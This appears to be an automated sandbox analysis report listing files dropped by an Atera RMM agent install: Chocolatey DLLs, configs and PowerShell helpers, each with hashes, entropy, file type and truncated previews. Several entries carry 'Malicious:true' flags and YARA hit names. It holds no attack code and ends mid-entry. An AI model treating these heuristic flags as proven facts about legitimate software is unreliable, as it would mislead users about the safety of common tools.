                                                                                                                                                                                                                                        SHA1:0B6C67912916233DD658CC8FDBDFD90ED4FF75DB
                                                                                                                                                                                                                                        SHA-256:9648A1444EF53BA5E65B7C925AB7CF9EA06AC48D957FC85A40D9E13A2B841699
                                                                                                                                                                                                                                        SHA-512:CAF1424B5E4CFD79D1D150E18B4292EC5E528AA4511069E19762A619A7A0C40C3C0245C58EB6468A5097506E6B0CF360C95744AE22BF144A7B5D54FE3F53F0B6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^...........!.................1... ...@....@.. ..............................uv....@..................................1..K....@..................((...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H........#......................P ......................................O..q.<.P$[p.;a<...Ci......K..!..&.d...FaLJ.....f..........w.E.E........(y...,.Lr..R..........T.z....5..;.. ....&V.=}.... .0.0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0................*..0...............*...0...............*...0..........

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51752
                                                                                                                                                                                                                                        Entropy (8bit):6.16945426601163
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:YbYPzANqrXnwgMZXyixq3pHN3OsjZMqlIFvdCRIgcWEpYi60C+:NUlI3pHNesVM0AvdScX76p+
                                                                                                                                                                                                                                        MD5:8C5EE7DE0F688A773C8CF420063222E0
                                                                                                                                                                                                                                        SHA1:CD85026613C106CC0B5EB9CE3E17F09176FD661E
                                                                                                                                                                                                                                        SHA-256:9CBE1B028D97F22CD71F08FB7A9F68DFC11A417DFB413C720F95F94FC13FB7D4
                                                                                                                                                                                                                                        SHA-512:FBB7489B13C08E48559E3E579F124271469F78677F843A4B42F3D676413946C563AC4912B3215A976D3710E85D2E6EF402E763CE533E676820FF844710E9107E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jm..........." ..0.................. ........... ..............................H.....`....................................O.......................((..............8............................................ ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........L..lj............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dll.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1140
                                                                                                                                                                                                                                        Entropy (8bit):4.958392223272386
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JduPF7N8OH2//3dVhOXrRH2/dV0PH2/+w3VUrPH2/+789y:327iOgl27Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                        MD5:082A70376537A2E9B0BD9DFAD8D2496D
                                                                                                                                                                                                                                        SHA1:1B4A667CFB09D050614149D6FD8A283071DC890A
                                                                                                                                                                                                                                        SHA-256:50934981FA1B0066B22261984941887740838459B5CFA06846BA15F39B4D10F9
                                                                                                                                                                                                                                        SHA-512:763212C74B6AB727C6E2C19CA2CDFC547B357BD5E1E5C196A3A2598DCEB316D3C8E8554A7EDD1AFA99FD38E1153EDC383631D2755BB31E70236084CF27C49875
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.0.12.0" newVersion="2.0.12.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedir

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\12-17-2024 12_46_46-log.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):275
                                                                                                                                                                                                                                        Entropy (8bit):4.877907726544251
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:tVb5kBm7ObCDL7fsDPV7gRoUvlwTS7v33LQ7mLLlGKACCWOKEe:pem717f8PV7UO+fo6BNVB
                                                                                                                                                                                                                                        MD5:DA74935F66150D0D5B81820876FB7CF6
                                                                                                                                                                                                                                        SHA1:72C2E449991D8AC8475D975278DA19E5ECD22602
                                                                                                                                                                                                                                        SHA-256:784F35617FF7C184384B9710C94709F9A55F3FABF51DC8A68C5429BC5A595E2D
                                                                                                                                                                                                                                        SHA-512:A37949ADC8B72F522CCE6875090585A47809E9CB3A269036BF2F318BE87AC189178DB2258410EC4EFADAA5E878074D027A6EE7FEB0C29827546270BD46CA904C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\12-17-2024 12_46_46-log.txt, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...Outdated Packages.. Output is package name | current version | available version | pinned?......Chocolatey has determined 0 package(s) are outdated. ..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6655016
                                                                                                                                                                                                                                        Entropy (8bit):6.267122556998023
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:4CMEM0MUMRMxMwMkfqbjxbSzGVr4W11ByHY4W6upIjf:8lV1qKpkfqbjeGVr4NHYJ60if
                                                                                                                                                                                                                                        MD5:287F2B076B6EB292F18D9011F5C77A55
                                                                                                                                                                                                                                        SHA1:7D7234644360DD12F91222842C43F206D7B53AB9
                                                                                                                                                                                                                                        SHA-256:88E5FD53C7D06A2FFC42D3DF5D09365E80FF418C8F0407D708061DBC8A58A898
                                                                                                                                                                                                                                        SHA-512:FBFBDF587E4315D445D646675D43BDC62BD905B96CF577DAD392E2A0CEAC18FC0399ED01BE2C99A33190B58908F8E41EBD035A5501953E11760AFB4F3346FA40
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Db........... ......c..........c.. ....c...@.. ........................e......e...@...................................c.L.....c..............de.((....e.......c...............................................c.............. ..H............text...w.c.. ....c................. ..`.rsrc.........c.......c.............@..@.reloc........e......be.............@..B................H.........A...!.........H....3..........................................0..T.......r...p...o......9,....s......o......o.....o..........9.....o...........9.....o......*.........3..........7E......"..o....*...b.:....~....*.o....(....*....0..s........:....~....*.o......9......i:....~....*.~....:...........s.........~....(...+~....:...........s.........~....(...+*.....6..r...p(....*.."..(....*...:.(......}....*..0..+.......s.2.....}.....r...pr...p... 2..s....o....&*......0..{........o..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\config\chocolatey.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9382
                                                                                                                                                                                                                                        Entropy (8bit):4.897728965151623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:rwhyxWvf7L6ZaBbrzRmXBzCWKZD68NJ+IK2E8V1ExAuVXI4n7rJ+ZXVx:sjL6ZiHt6B+WshDK2EiEJ7lEFx
                                                                                                                                                                                                                                        MD5:14FFCF07375B3952BD3F2FE52BB63C14
                                                                                                                                                                                                                                        SHA1:AB2EADDE4C614EB8F1F2CAE09D989C5746796166
                                                                                                                                                                                                                                        SHA-256:6CCFDB5979E715D12E597B47E1D56DB94CF6D3A105B94C6E5F4DD8BAB28EF5ED
                                                                                                                                                                                                                                        SHA-512:14A32151F7F7C45971B4C1ADFB61F6AF5136B1DB93B50D00C6E1E3171E25B19749817B4E916D023EE1822CAEE64961911103087CA516CF6A0EAFCE1D17641FC4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<chocolatey xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">.. <config>.. <add key="cacheLocation" value="" description="Cache location if not TEMP folder. Replaces `$env:TEMP` value for choco.exe process. It is highly recommended this be set to make Chocolatey more deterministic in cleanup." />.. <add key="containsLegacyPackageInstalls" value="true" description="Install has packages installed prior to 0.9.9 series." />.. <add key="commandExecutionTimeoutSeconds" value="2700" description="Default timeout for command execution. '0' for infinite (starting in 0.10.4)." />.. <add key="proxy" value="" description="Explicit proxy location. Available in 0.9.9.9+." />.. <add key="proxyUser" value="" description="Optional proxy user. Available in 0.9.9.9+." />.. <add key="proxyPassword" value="" description="Optional proxy password. Encrypted. Available in 0.9.9.9+." />.. <add key

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\config\chocolatey.config.7284.update

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9382
                                                                                                                                                                                                                                        Entropy (8bit):4.897728965151623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:rwhyxWvf7L6ZaBbrzRmXBzCWKZD68NJ+IK2E8V1ExAuVXI4n7rJ+ZXVx:sjL6ZiHt6B+WshDK2EiEJ7lEFx
                                                                                                                                                                                                                                        MD5:14FFCF07375B3952BD3F2FE52BB63C14
                                                                                                                                                                                                                                        SHA1:AB2EADDE4C614EB8F1F2CAE09D989C5746796166
                                                                                                                                                                                                                                        SHA-256:6CCFDB5979E715D12E597B47E1D56DB94CF6D3A105B94C6E5F4DD8BAB28EF5ED
                                                                                                                                                                                                                                        SHA-512:14A32151F7F7C45971B4C1ADFB61F6AF5136B1DB93B50D00C6E1E3171E25B19749817B4E916D023EE1822CAEE64961911103087CA516CF6A0EAFCE1D17641FC4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<chocolatey xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">.. <config>.. <add key="cacheLocation" value="" description="Cache location if not TEMP folder. Replaces `$env:TEMP` value for choco.exe process. It is highly recommended this be set to make Chocolatey more deterministic in cleanup." />.. <add key="containsLegacyPackageInstalls" value="true" description="Install has packages installed prior to 0.9.9 series." />.. <add key="commandExecutionTimeoutSeconds" value="2700" description="Default timeout for command execution. '0' for infinite (starting in 0.10.4)." />.. <add key="proxy" value="" description="Explicit proxy location. Available in 0.9.9.9+." />.. <add key="proxyUser" value="" description="Optional proxy user. Available in 0.9.9.9+." />.. <add key="proxyPassword" value="" description="Optional proxy password. Encrypted. Available in 0.9.9.9+." />.. <add key

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\config\chocolatey.config.backup (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9382
                                                                                                                                                                                                                                        Entropy (8bit):4.897728965151623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:rwhyxWvf7L6ZaBbrzRmXBzCWKZD68NJ+IK2E8V1ExAuVXI4n7rJ+ZXVx:sjL6ZiHt6B+WshDK2EiEJ7lEFx
                                                                                                                                                                                                                                        MD5:14FFCF07375B3952BD3F2FE52BB63C14
                                                                                                                                                                                                                                        SHA1:AB2EADDE4C614EB8F1F2CAE09D989C5746796166
                                                                                                                                                                                                                                        SHA-256:6CCFDB5979E715D12E597B47E1D56DB94CF6D3A105B94C6E5F4DD8BAB28EF5ED
                                                                                                                                                                                                                                        SHA-512:14A32151F7F7C45971B4C1ADFB61F6AF5136B1DB93B50D00C6E1E3171E25B19749817B4E916D023EE1822CAEE64961911103087CA516CF6A0EAFCE1D17641FC4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<chocolatey xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">.. <config>.. <add key="cacheLocation" value="" description="Cache location if not TEMP folder. Replaces `$env:TEMP` value for choco.exe process. It is highly recommended this be set to make Chocolatey more deterministic in cleanup." />.. <add key="containsLegacyPackageInstalls" value="true" description="Install has packages installed prior to 0.9.9 series." />.. <add key="commandExecutionTimeoutSeconds" value="2700" description="Default timeout for command execution. '0' for infinite (starting in 0.10.4)." />.. <add key="proxy" value="" description="Explicit proxy location. Available in 0.9.9.9+." />.. <add key="proxyUser" value="" description="Optional proxy user. Available in 0.9.9.9+." />.. <add key="proxyPassword" value="" description="Optional proxy password. Encrypted. Available in 0.9.9.9+." />.. <add key

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\ChocolateyTabExpansion.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (965), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12946
                                                                                                                                                                                                                                        Entropy (8bit):5.132019659587194
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ctpHjcTfbZO0g2ZyAvGZkAsoXCxAziDR/67E4Pb:ctpDBCvGZkAsCCxAziDR/sF
                                                                                                                                                                                                                                        MD5:0BB54C9DA241E0EAAFB6C976AC07EAA7
                                                                                                                                                                                                                                        SHA1:045808C9106A4C356AB15A2D8680FDB737DC98A6
                                                                                                                                                                                                                                        SHA-256:071CE6FCE85051E373C1B05BB82A92FFB8BEBF34C768B7A2F6E809000A78479F
                                                                                                                                                                                                                                        SHA-512:C118C9FEC5903D1F2F6A6FA070130FCEBAAD70AF3459DA82069C5C8ED3D66CEE374C098C6247CCD528187B6856FAA458EBBD8B6F2C0C68C2A5B8EF32C2D7CD75
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....# Ideas from the Awesome Posh-Git - https://github.com/dahlbyk/posh-git..# Posh-Git License - https://github.com/dahlbyk/posh-git/blob/1941da2472eb668cde2d6a5fc921d5043a024386/LICENSE.txt..# http://www.jeremyskinner.co.uk/2010/03/07/using-git-with-windows-powershell/....$Global:ChocolateyTabSettings = New-Object PSObject -P

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\chocolateyInstaller.psm1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3903
                                                                                                                                                                                                                                        Entropy (8bit):4.986280475081154
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:cSyL+4pGXHFKoqWJBYc4R2wf3TQJb3jl7t3iv:cSyL+QGXHMWJB7VFUv
                                                                                                                                                                                                                                        MD5:1CF35331F337493A5B5B8C482E32B507
                                                                                                                                                                                                                                        SHA1:149D5B5ABB4FF20CFAA333946BAAEC6B8EFA5630
                                                                                                                                                                                                                                        SHA-256:CCF763934E3801002C260246316DF70C64C66E7721C24B300C634567F5885A39
                                                                                                                                                                                                                                        SHA-512:03652CA25D2A78860F735B57600B940D2723DD23E24A2632D5CA76DBFACBF95CD1090428FB6AC23BF945AB20C1C201155CF26161361853DB94A5D85AE753C0A1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....$helpersPath = Split-Path -Parent $MyInvocation.MyCommand.Definition....$global:DebugPreference = "SilentlyContinue"..if ($env:ChocolateyEnvironmentDebug -eq 'true') {.. $global:DebugPrefe

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\chocolateyProfile.psm1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1178
                                                                                                                                                                                                                                        Entropy (8bit):5.161789340951933
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:cSyJ3554IpgyZA0SU0E+SlHQk1GpsLAjQSDg6pucReEe7:cSyX54pyFd0AlH31KoLKRed
                                                                                                                                                                                                                                        MD5:610AD6370C8DACB3861200B8827DF768
                                                                                                                                                                                                                                        SHA1:E6831DF0C1ADB4664BDE6D2D48DCE28CC1918A83
                                                                                                                                                                                                                                        SHA-256:B06996C9A26663FCF41B2406D12C4597075AB7F94CDD320EEE64EAC9AEA95DFD
                                                                                                                                                                                                                                        SHA-512:C3A30128443E47D5D38CFD8C989E8317668EEDA6B4E85BEE94B76034479DEC0BED4C980ACD797153259CF0DF2807E79C3B3F4AAADF21E255A35BBDBE2F2E16E9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# ..# You may obtain a copy of the License at..# ..# http://www.apache.org/licenses/LICENSE-2.0..# ..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....if (Get-Module chocolateyProfile) { return }....$thisDirectory = (Split-Path -parent $MyInvocation.MyCommand.Definition)..... $thisDirectory\functions\Write-FunctionCallLogMessage.ps1... $thisDirectory\functions\Get-EnvironmentVariable.ps1... $thisDirectory\functions\Get-EnvironmentVariableNames.ps1... $thisDirectory\fun

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\chocolateyScriptRunner.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2892
                                                                                                                                                                                                                                        Entropy (8bit):5.176658574720988
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:RkBibyQwcYIRQcRwAshP5l8kRMCpEMwK/JvoPEY0nzWBIxjO0L5E8bWHtt6rh4:eiAc5HGAshhCQMChR/JsZYzWBeO85Ecm
                                                                                                                                                                                                                                        MD5:EF32E09F41D2F8234E4482C6B52FFFB1
                                                                                                                                                                                                                                        SHA1:446185592825F7B7894CC5A9E2FCB4F015B9E810
                                                                                                                                                                                                                                        SHA-256:ACC5E8AB085FDD00B1C333853D74B1EC15777212A435C2DE8B56A490BE07103C
                                                                                                                                                                                                                                        SHA-512:7273DE65F571C4302BAC73C3FA3AEBDB7887B923EABAC10457C2A2C329B67979726440ED0C5E190C7728676D9382D4C8E2F4D030336630BC82AC7AE2FB20B58F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.param(.. [alias("ia","installArgs")][string] $installArguments = '',.. [alias("o","override","overrideArguments","notSilent")].. [switch] $overrideArgs = $false,.. [alias("x86")][switch] $forceX86 = $false,.. [alias("params","parameters","pkgParams")][string]$packageParameters = '',.. [string]$packageScript..)....$global:DebugPreference = "SilentlyContinue"..if ($env:ChocolateyEnvironmentDebug -eq 'true') { $global:DebugPreference = "Continue"; }..$global:VerbosePreference = "SilentlyContinue"..if ($env:ChocolateyEnvironmentVerbose -eq 'true') { $global:VerbosePreference = "Continue"; $verbosity = $true }....Write-Debug '---------------------------Script Execution---------------------------'..Write-Debug "Running 'ChocolateyScriptRunner' for $($env:packageName) v$($env:packageVersion) with packageScript `'$packageScript`', packageFolder:`'$($env:packageFolder)`', installArguments: `'$installArguments`', packageParameters: `'$packageParameters`',"....## Set the culture to invar

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Format-FileSize.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1751
                                                                                                                                                                                                                                        Entropy (8bit):5.27319452124258
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:cSyJ3554IpXAAyU0E+SlHQk1GpsLAKFoYlMp9TlxNAZiTxGEXL5FGX/OFchWoCah:cSyX54q90AlH31Koyh9xnFVVc/4oqPli
                                                                                                                                                                                                                                        MD5:12E0A95C9BD0A49DA769C2927C648DFB
                                                                                                                                                                                                                                        SHA1:33174164C23D10B43E26CEE56E1A6FB60E8D9F4D
                                                                                                                                                                                                                                        SHA-256:3A2A002BD7213ECCE52FB82C470B824770A11DEB0A33DDB319A24824CE4676DA
                                                                                                                                                                                                                                        SHA-512:D19E22031409B216A10815FE606852712EF0136B9056541774DC66AE9C57994DE5A667AE1F925D547D1BCCF6AE9221D939F7CE2BFC87ABC98C634858E1CCAA7B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....Function Format-FileSize {..<#...SYNOPSIS..DO NOT USE. Not part of the public API......DESCRIPTION..Formats file size into a human readable format......NOTES..Available in 0.9.10+.....This function is not part of the API......INPUTS..None.....OUTPUTS..Returns a string representation of the file size in a more friendly..form

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-CheckSumValid.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (505), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):11504
                                                                                                                                                                                                                                        Entropy (8bit):5.008896354130034
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHpi+o8HrDe07ZUWKVjakELFiuPOizDIinqSQ/fa:ctL+QGwKS07ZUOZPpDDyfa
                                                                                                                                                                                                                                        MD5:9443CB695D075DAA7DE91510A1E35C14
                                                                                                                                                                                                                                        SHA1:7676604D3C1F0BD26632DC41FCF1310908D422C6
